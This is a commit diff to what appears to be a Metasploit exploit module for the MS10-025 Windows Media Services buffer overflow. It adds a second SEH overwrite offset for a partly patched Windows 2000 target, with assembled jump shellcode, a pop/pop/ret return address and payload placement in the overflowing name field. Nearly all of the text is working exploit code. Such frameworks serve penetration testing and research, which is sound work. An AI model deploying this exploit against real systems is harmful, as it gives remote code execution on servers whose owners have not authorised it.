add post-first-patch target

git-svn-id: file:///home/svn/framework3/trunk@9118 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb

@@ -54,9 +54,13 @@ class Metasploit3 < Msf::Exploit::Remote
 				[
 					[ 'Windows 2000 Pro SP4 English',
 						{
+							# Unpatched:
 							# SEH handler offset is 840
 							# Stack return is at 652
+							# "Patched":
+							# SEH handler offset is 832
 							'Offset' => 840,
+							'Offsets' => [ 832, 840 ],
 							'Ret' => 0x75022ac4 # p/p/r in ws2help.dll
 						} 
 					], 
@@ -93,15 +97,28 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# Convert it to Unicode..
 		name = Rex::Text.to_unicode(name)
-		
+
 		# Insert the return address..
 		name[4,payload.encoded.length] = payload.encoded
 
 		# Build the SEH frame that leads to the payload...
-		seh = generate_seh_record(target.ret)
-		asm = "add edi, 0x04\njmp edi"
-		seh << Metasm::Shellcode.assemble(Metasm::Ia32.new, asm).encode_string
-		name[target['Offset'],seh.length] = seh
+		target['Offsets'].each { |off|
+			seh = ''
+			case off
+			when 832
+				code = Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-652").encode_string
+				code << rand_text(8 - code.length)
+				name[off-8,code.length] = code
+				seh << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-8").encode_string
+				seh << rand_text(2)
+				seh << [target.ret].pack('V')
+			when 840
+				seh << generate_seh_record(target.ret)
+				asm = "add edi, 0x04\njmp edi"
+				seh << Metasm::Shellcode.assemble(Metasm::Ia32.new, asm).encode_string
+			end
+			name[off,seh.length] = seh
+		}
 
 		# Add it to the command buffer..
 		cmd_buf << make_command(0x30002, name)